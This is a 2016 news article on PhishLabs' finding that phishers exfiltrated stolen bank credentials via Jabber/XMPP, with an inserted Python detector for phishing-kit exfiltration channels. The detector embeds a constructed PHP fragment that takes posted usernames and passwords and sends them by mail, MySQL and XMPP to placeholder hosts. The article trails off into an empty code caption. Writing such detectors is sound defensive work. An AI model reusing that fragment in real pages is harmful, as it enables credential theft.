Crooks opt for an insecure method of collecting phished data

Aug 11, 2016 17:01 GMT  ·  By
Crane Hassold, PhishLabs: Gmail the favorite email provider used in phishing campaigns for exfiltrating compromised data

Cyber-criminals dabbling in phishing campaigns are experimenting with a new method of exfiltrating data from phishing websites, relying on the Jabber service to send data to their XMPP accounts, according to a report shared with Softpedia by PhishLabs, a company specialized in detecting and preventing phishing attacks.

Phishing attacks rely on drawing a victim to a malicious website that looks like a legitimate service, and tricking the user into entering sensitive information on this fake website. All the data the user enters gets logged and sent to the attacker.

This "logging and sending" phase is usually handled by special code inside the website's source. Because of the plethora of readily available PHP mailer scripts, most crooks use PHP for this task and opt to send the data to email accounts they have specifically set up to receive compromised information.

There have also been campaigns in which crooks sent phished data to remote MySQL databases, but in the vast majority of cases, emailing the stolen data is the main method of collecting it.

Campaign against Canadian financial institution uses Jabber/XMPP

In a recent phishing campaign that targeted a Canadian financial institution, PhishLabs showed Softpedia evidence it found in the phishing site's source code that the crooks were sending compromised information to a Jabber/XMPP account.

Whenever the crook logged into this account, he'd find offline messages holding data collected from the phishing website.

The crook's particular choice for the XMPP server was Exploit.im, the infamous Russian-based Jabber service also used by numerous other criminals in the past.

This includes Tessa88 (aka [email protected]), one of the people behind some recent mega-breaches like MySpace and LinkedIn, and Rory Guidry (aka [email protected]), a hacker arrested after selling botnets on the Darkode hacking forum.
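A triage helper for analysts who recover a phishing kit's source, added here as an example that is not from the article or from PhishLabs: it flags which of the three exfiltration channels described above (a PHP mail() call, a remote MySQL database, or Jabber/XMPP) the kit uses and pulls out the destination addresses. The sample kit fragment, the hostnames and the JabberClient class name are all constructed for this example.

```python
import re

# One pattern per exfiltration channel the article describes. The email and
# MySQL patterns capture the destination (recipient / DB host); the XMPP one
# only detects library or protocol references, JIDs are collected separately.
PATTERNS = {
    "email": re.compile(r"\bmail\s*\(\s*['\"]([^'\"]+)['\"]"),
    "mysql": re.compile(r"\bmysqli?_connect\s*\(\s*['\"]([^'\"]+)['\"]"),
    "xmpp":  re.compile(r"\b(?:xmpp|jabber)\b", re.I),
}
# A Jabber ID looks like an email address, so JIDs are only reported when an
# XMPP/Jabber reference is also present, and mail() recipients are excluded.
JID_RE = re.compile(r"['\"]([\w.+-]+@[\w.-]+\.[a-z]{2,})['\"]", re.I)

# Constructed sample kit fragment (not taken from any real kit).
SAMPLE_KIT = '''<?php
$msg = "User: ".$_POST['user']." Pass: ".$_POST['pass'];
mail("drop-box@example.net", "Bank Login", $msg);
mysqli_connect("db.example.org", "u", "p", "logins");
require_once "jabber/client.php";
$j = new JabberClient("xmpp.example.org", 5222, "collector@xmpp.example.org", "pw");
$j->send("crook-inbox@xmpp.example.org", $msg);
'''

def find_exfil_channels(source: str) -> dict:
    """Return {channel: [destinations]} for each exfiltration channel found."""
    findings = {}
    for name, rx in PATTERNS.items():
        hits = rx.findall(source)
        if hits:
            # Patterns with a capture group yield destinations; the XMPP
            # pattern has none, so its list is filled in below from JIDs.
            findings[name] = sorted(set(hits)) if rx.groups else []
    if "xmpp" in findings:
        mailed = set(findings.get("email", []))
        findings["xmpp"] = sorted(j for j in set(JID_RE.findall(source))
                                  if j not in mailed)
    return findings

if __name__ == "__main__":
    for channel, dests in find_exfil_channels(SAMPLE_KIT).items():
        print(f"{channel}: {', '.join(dests) or '(no destination extracted)'}")
```

Because this is a static string scan, kits that build the recipient or JID at runtime (concatenation, base64, eval) will show the channel without a destination, which is itself worth a closer look.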

Sending data via Jabber is insecure

"It is unknown why the phishers in this campaign have used Jabber as the exfiltration method," PhishLabs expert Crane Hassold told Softpedia.

"It’s a curious choice since, absent the use of encryption and without having control of the Jabber server, there is nothing stopping the administrator of the server from scanning and logging the contents of the messages being sent that contain the compromised information."

"It does show, however, that phishers are continually developing new methods to facilitate their malicious activities," Crane added.

Code for sending collected data via Jabber
